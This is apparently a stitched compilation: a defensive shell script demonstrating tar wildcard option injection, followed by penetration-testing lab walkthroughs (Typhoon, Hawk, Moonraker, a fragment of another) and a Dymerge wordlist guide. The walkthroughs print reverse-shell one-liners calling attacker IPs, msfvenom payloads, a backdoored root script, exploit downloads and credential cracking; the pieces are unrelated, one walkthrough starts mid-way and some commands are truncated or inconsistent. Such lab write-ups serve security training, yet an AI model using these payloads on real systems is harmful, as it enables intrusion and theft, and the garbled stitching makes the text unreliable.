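# Why `tar cf archive.tar *` is dangerous: the shell expands `*`, so a file
# literally named `--checkpoint=1` lands in tar's argv looking exactly like
# the option --checkpoint=1, and tar honours it.

# has_option_like_names DIR
# Prints every non-hidden entry in DIR whose name begins with '-' and
# returns 0 (true) if at least one exists, 1 (false) otherwise.
has_option_like_names() {
    dir="$1"
    hit=1
    for path in "$dir"/*; do
        [ -e "$path" ] || continue        # unmatched glob stays literal; skip it
        name="${path##*/}"
        case "$name" in
            -*) printf 'option-like file name: %s\n' "$name"; hit=0 ;;
        esac
    done
    return "$hit"
}

# safe_archive ARCHIVE DIR
# Archives DIR's contents without a shell glob: tar changes into DIR and
# archives '.', and '--' ends option parsing, so member names can never be
# mistaken for options. Returns tar's exit status.
safe_archive() {
    archive="$1"
    dir="$2"
    tar -cf "$archive" -C "$dir" -- .
}

# Stand-alone demonstration with constructed names (mirrors the data/ dir above).
demo() {
    work=$(mktemp -d) || return 1
    mkdir "$work/data"
    : > "$work/data/wp.sh"
    : > "$work/data/--checkpoint=1"
    : > "$work/data/--checkpoint-action=exec=sh wp.sh"
    if has_option_like_names "$work/data"; then
        echo "refusing 'tar cf archive.tar *' here; using safe_archive instead"
    fi
    # Members are listed as ./--checkpoint=1 etc.: plain file names, not options.
    safe_archive "$work/archive.tar" "$work/data" && tar -tf "$work/archive.tar"
    rm -rf "$work"
}

demo
```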


We set up our listener using netcat; as soon as we run the tar command as user “onuma”, we get our reverse shell as user “onuma”. Now we change directory to /home/onuma and find the file “user.txt”. We take a look at its content and find the first flag. After finding the flag we spawn a TTY shell using Python.
python -c 'import pty; pty.spawn("/bin/bash")'



Enumerating through the system we find a file called backuperer that is symlinked to a file named “backup” in the “/usr/local/bin” directory.



We take a look at the content of the file and find that it is a script that creates a gzip archive of the files inside “/var/www/html/”. It also checks the integrity of the archive 30 seconds after creating it.



We use a script that takes advantage of the “sleep” in that script: since it waits for 30 seconds before checking the integrity of the archive, we have 30 seconds to recreate the archive. We use this script here. After running the script we find the root flag.



Typhoon: Vulnhub Walkthrough


Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.
Flag: root-flag
Since there are multiple ways to exploit this machine, we have used two methods to capture the flag, as follows:
Method 1: Using a local privilege escalation shell after logging into SSH.
Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our target’s IP.
netdiscover


We found our target IP –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgresql), 8080(http).
Further, we notice an entry /mongoadmin/ in robots.txt, which might be useful.



We also notice that port 8080 is open for Apache Tomcat/Coyote JSP Engine 1.1. This could be another way of exploiting this machine, but we will see to it later on.


Moving on, since port 80 is also open, we browsed to the found directory /mongoadmin/ in the browser. The result is shown in the image. Here we change the database to credentials (84mb). It displays a link to 2 credentials. Click on it.


Clicking on the 2 Credentials link gives us 2 credentials: [username]:typhoon and [password]:789456123. These credentials might be a great help for further enumeration.


After some time, we struck on an idea: why not use the found creds to log in with SSH, since port 22 is also open?
Then we simply logged in to SSH with the credentials Username: typhoon & Password: 789456123
ssh typhoon@192.168.1.101
Then we checked the system information and found out that Ubuntu 14.04 is running on the target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.


Next we look for an exploit for Ubuntu 14.04 using searchsploit. The exploit we used is highlighted; after that we copied the exploit 37292.c to the /root/ directory and started a Python server to download the file onto the target machine.


Afterwards we downloaded our exploit 37292.c into the /tmp directory. After compiling it and granting it execute permission, we executed it.
Booyeah!! We have got root access and found our FLAG. We take a look at the content of the file and are greeted with a congratulatory message.


Method 2
Using Tomcat Manager Upload to get a meterpreter session and then establishing a reverse connection to get root access.
Let’s Begin with the Walkthrough!!
Since in the Method 1 port scan we noticed that port 8080 is open for Apache Tomcat/Coyote JSP Engine 1.1, let’s browse the target IP on port 8080 in the browser.


We are very familiar with the Tomcat Server login using the manager webapp from our previous lab experiences. Without wasting time we logged straight into the Tomcat Server using Metasploit’s Tomcat Manager upload module with the default credentials for the Tomcat Server login.
[username]:tomcat
[password]:tomcat
Oh Yeah! We have got the meterpreter. After spending a lot of time on enumeration, we found a directory /tab containing a file script.sh that was owned by root and had full permissions. So we thought of inserting malicious code into script.sh.


Moving on!! We need to create a bash payload using msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R
After that, append the above generated malicious code to the script.sh file.


echo "mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo" > script.sh


Since the malicious code was executed along with the script.sh file, we got a reverse shell on our netcat listener.
Yeah!! We have got root access and found root-flag. We take a look at the content of the file and are greeted with a congratulatory message.


Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge, “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are available online, they have a static IP. The IP of HawkNew is 10.10.10.102

Penetration Methodology:
§  Port scanning and IP discovery
§  Anonymous FTP Login
§  Checking file type
§  Getting Login Credentials
§  Browsing IP through port 80
§  Exploiting Drupal
§  Reading First Flag User.txt
§  Getting Login Credentials
§  Spawning TTY Shell
§  Searching exploit via Searchsploit
§  Getting root Access
§  Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).



From the NMAP scan output we saw that FTP port 21 is open, and the next thing that catches our eye is that it has anonymous login allowed.

ftp 10.10.10.102

We easily connected to FTP through anonymous login. Moving on, after navigating through multiple directories we found a hidden file, “.drupal.txt.enc”, and then we transferred the file to our local machine.



Since .drupal.txt.enc is encrypted, let’s check the file type using the ‘file’ command.

file .drupal.txt.enc

It came out to be openssl encoded data with a salted password. Clearly we need to decrypt the file to get any further clue.




To crack this file, we used an openssl brute-force tool which is easily available on GitHub. You can download it from the link below, or run the following commands to download and execute the script.

git clone https://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file, and the password hint we got is “PencilKeyboardScanner123”. This could be the password for the CMS login. Let’s check it.



As port 80 is running an HTTP server, we open the target machine’s IP address in our browser and find a Drupal login page. To log in we used the basic Username: admin and Password: PencilKeyboardScanner123.


Oh yeah!! We have successfully logged into the admin dashboard. Now go to Modules and enable the checkboxes for Path and PHP filter.





After that go to Content > Add Content > Basic Page to create a basic page where we can write the malicious code that spawns the web shell. Give any title for your malicious code.
Here we have written a one-liner PHP reverse shell with the help of the Pentest Monkey website.

&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the Text format as “PHP code”. Before saving, start a netcat listener on the listening port, so that once the code is executed it will establish a reverse connection.
nc -lvp 1234




We got a reverse connection from the victim’s machine on our netcat listener. To spawn a proper shell we used the python3 bin/bash one-liner.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Inside /home/daniel we got the user.txt flag; now it is time to find the root flag. While exploring the directories, we thought of reading the contents of the “settings.php” file, in which we found the password: drupal4hawk
cat settings.php | grep Password


Then with the following command we switch user and log in as daniel.
su daniel
Password: drupal4hawk
Here we used simple Python 3 commands to escape the python3 interpreter and spawn a shell.
>>> import pty
>>> pty.spawn('/bin/bash')


From the Nmap scan output we noticed that an H2 database is running on port 8082, therefore we search for an H2 database exploit in searchsploit.
searchsploit H2 database
It came out to be a Remote Code Execution. The exploit we used is highlighted; after that we copied the exploit 45506.py to the /root directory and ran a Python server to download the file onto the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080



Afterwards we downloaded our exploit 45506.py into the /tmp directory of the target machine. Then we granted full permissions to the exploit and executed it with the following commands.
cd /tmp
wget http://10.10.14.10:8080/45506.py
chmod 777 45506.py
python3 45506.py -H 127.0.0.1:8082
id
Finally!! We have got root access. Now let’s go and get “root.txt”. We take a look at the content of the file and find our final flag.





Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Comprehensive Guide on the Dymerge


Hello friends! This article is a comprehensive guide to the Dymerge tool. This is a handy little tool that helps you manage all the dictionaries you’ve created by reading through our blog and using all the amazing tools we’ve written about.

Table of Content
§  What is Dymerge
§  Installing and Launching Dymerge
§  Standard Merge
§  Fast Mode
§  Removing Duplicates
§  Reverse Listing
§  Alphabetic and Numeric Sorting
§  Defining Output
§  Including Characters
§  Compressing Output

Introduction to Dymerge
Dymerge is a tool that gives you the ability to manage dictionaries. By manage we mean it lets you reshape and merge them. Reshaping and merging may seem trivial, but considering that you could be dealing with millions of words, even the smallest operation can turn into a mammoth and complicated task.

Installing and Launching Dymerge

We can install Dymerge from GitHub and launch it in two simple commands. We have used the “-h” flag to display the various options Dymerge has to offer.

git clone https://github.com/k4m4/dymerge.git
./dymerge.py -h

Standard Merge

We hope you have a few dictionaries handy to follow along with what we are doing. This is a standard merge, where we specify the paths to 2 different dictionaries and Dymerge combines them.
To avoid any confusion, the command is “./dymerge.py” followed by the path of the first dictionary, then a space and the path to the second dictionary. By default the output will be in a file named “dymerged.txt”.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt


Fast Mode
Arguably, if the dictionaries are very large, any operation on them will take time. The person who made Dymerge thought of this conundrum and gave us a way to speed up the process using the “-f” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -f



Removing Duplicates

A lot of dictionary-making software follows the same logic, so there are bound to be identical words from time to time. Dymerge gives us the option to remove duplicate words from dictionaries while combining them. To achieve this, we use the “-u” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u -f


Reverse Listing

Dymerge gives us the option to reverse the order of the words in the dictionaries that we merge; this means that the first word in the new dictionary will be the last word of the second dictionary.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r -f


Alphabetic and Numeric Sorting

This option lets us sort words alphabetically; it also sorts numbers following the progression of a number line from left to right when merging 2 dictionaries into 1. We use the “-s” flag to perform this operation.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f


Defining Output

So far we have been letting Dymerge save the output using its default settings; this time we will define the file name and destination of the output using the “-o” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt

Including Characters

Just in case we need something specific added to the dictionary, we can use the “-i” flag. Any characters placed after the include flag are added to the dictionary.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj


And here we see “raj” being added to the dictionary.


Compressing Output
Dictionaries can be pretty big in size, especially when you’re talking about a unified dictionary comprised of multiple dictionaries. Dymerge gives us the option to compress our output using the “-z” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -z zip

All said and done, this is a pretty neat little tool to use when you’re dealing with multiple dictionaries and need something to bring a bit of order. The functions it performs may seem simple on the face of it, but they are without a doubt very useful.
Stay tuned for more articles on the latest and greatest in hacking.

Moonraker:1 Vulnhub Walkthrough


Hack into the Moonraker system and discover who's behind these menacing plans once and for all. Find and destroy the Villain before it's too late. You've received intelligence of a new Villain investing heavily into Space and Laser Technologies. Although the Villain is unknown we know the motives are ominous and apocalyptic. The challenge is to get root on the Targeted Virtual Machine and read the flag.txt within that directory.
Download it from here: https://www.vulnhub.com/entry/moonraker-1,264/
Penetrating Methodology:
  • Network Scanning (Netdiscover & Nmap)
  • Web directory enumeration (Dirb)
  • Tail off apache2 access logs.
  • Browsing through discovered directories.
  • Finding Login Credentials for CouchDB’s Login.
  • Fauxton Login Page Link.
  • Checking Various Directories over browser.
  • Finding Login Credentials.
  • Logging into Node.js express framework.
  • Capturing Cookie using Burpsuite.
  • Using Node.js deserialization exploit for RCE.
  • Converting Decimal value to ASCII text.
  • Using a script to Convert ASCII text to Decimal value.
  • Base64 encoding using echo.
  • Getting reverse shell over netcat listener.
  • Converting Hash string using John the Ripper tool
  • Getting root access.
  • Reading the flag.
Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our target’s IP.
netdiscover



We found our target IP –> 192.168.1.110
Our next motive is to scan the target IP with nmap.
nmap -p- -A 192.168.1.110 --open
The NMAP scan output shows various open ports: 22(ssh), 80(http), 110(pop3), 3000(http), 4369(epmd), 5984(couchdb).


From NMAP Scan output, we saw port 80 is open. Therefore we navigate to port 80 in the web browser. But it was not much of a help to move ahead.



Now we thought of enumerating for accessible directories on the Target Machine with the help of following command.

dirb http://192.168.1.110/
After recursively enumerating, we found a useful directory, /services, as highlighted.


Let’s browse to the found directory /services in the browser, where at the bottom of the webpage we saw a SEND AN INQUIRY hyperlink. Let’s find out where it leads by clicking on it.



It opened a SERVICES INFORMATION REQUEST FORM, as shown in the image. We noticed that someone will check our web-based enquiry and contact us in under 5 minutes. This suggests that some kind of log will be made. But the question is where?


We filled the enquiry form using HTML code with an image tag, as shown in the image.


Before clicking Submit to Sales Rep!, we restarted the apache2 service, because if any logs are made we can easily see them in the apache2 access.log. After clicking Submit, it displayed a thanks for your inquiry message, as shown in the image.


We then tail the apache2 access log with the following command.
tail -f /var/log/apache2/access.log
The log entry exposed a new webpage, as highlighted in the image.



Let’s find out where the new webpage takes us. For that we opened it in the browser.


So it leads us to Sales Admin Interface. This looks interesting and might be holding some great clues.


Next we opened CouchDB Notes and got some hints about login credentials: Username: jaws and Password: Jaws’ girlfriend’s name + x99. Here we Googled Jaws’ girlfriend’s name, which came out to be dolly.



We will need these credentials to log into Fauxton, which is included in Apache CouchDB. To know more about Fauxton and CouchDB we searched for them on Google and found a hint on how to open the CouchDB login page.


Since port 5984 is open, we are able to open the CouchDB login page.
192.168.1.110:5984/_utils/
Here we used the following login credentials:
Username: jaws
Password: dollyx99


Booyeah!! We have successfully logged in. Now let’s check out the docs inside these 3 databases.


The link database came out to be useful. Looking through the documents inside the link database, every document contains a directory link, but the highlighted one might give us another clue for our next step.


So the link we have found in the highlighted document is shown in the image. Let’s copy and open this link in the browser.


So the above link opened an OFFER LETTER ARCHIVE BACKUP WEBPAGE. This is interesting, let’s check out what’s hiding in these offer letters.


Woah!! All the offer letters contain a username and password. The one we used is shown in the image.


From the NMAP scan output, we knew port 3000 holds a Node.js framework. So we browsed the target IP on port 3000 in the browser and encountered a login portal. The credentials used to log in are as follows:
Username: hugo
Password: TempleLasersL2K



After successfully logging in, we are shown the message in the image. This page seems of no use, but after spending time figuring out what to do next it became very interesting.



Time to launch Burp Suite and intercept the request for this page. After intercepting we saw a base64 encoded string in Cookie: profile, as you can see in the image. Here we will be inserting the Node.js deserialization exploit in base64 encoded form. Let’s begin with the process.




From the image you can see that we will copy a Node.js deserialization exploit for Remote Code Execution.
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/



After copying it, let’s convert the decimal values into ASCII text using a converter available online. And don’t forget to copy the ASCII text.



Using nano, we created a file and pasted in the copied ASCII text. Here we put our Kali Linux IP in host and set port to 1337, then saved it.



So we created a script, exploit.py, which converts the ASCII text to decimal values and puts a comma between each converted value. We then use the echo command to convert the decimal values into a base64 encoded string, and copy the whole base64 string.



Set the copied base64 string as Cookie: profile in the request intercepted in Burp Suite, and before forwarding the request start a netcat listener on port 1337.



We therefore got a reverse shell on our netcat listener. To spawn a shell we used the python bin/bash one-liner.
python -c 'import pty; pty.spawn("/bin/bash")'
After recursively enumerating we found four mailboxes in /var/mail, but the problem is that we lack permissions on them. Looking into CouchDB’s configuration, we came across the fact that CouchDB’s default installation directory is /opt/couchdb and that it reads its configuration file from etc/local.ini under that directory.
Let’s tail the contents of local.ini.
tail /opt/couchdb/etc/local.ini
After running this command, it displayed another login credential, as shown in the image.
Username: hugo
Password: 321Blast0ff!!


Then with the following commands we switch user and log in as hugo.
su hugo
password: 321Blast0ff!!

Reading hugo’s mail, we noticed that Message 2 is interesting, as it contains the password to root as a hash and also tells us to add ‘VR00M’ after root’s password. Time to crack the password; to do that we copied the hash and pasted it inside a file named hash.



Therefore, John the Ripper cracked the hashed password for root, i.e.
Username: root
Password: cyber



Let’s again switch user and log in as root.
su root
Password: cyberVR00M
Booyeah!! We have successfully logged in as root, and while checking through its mail directory we found our flag.txt file. We take a look at the content of the file and are greeted with a congratulatory message.



Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here
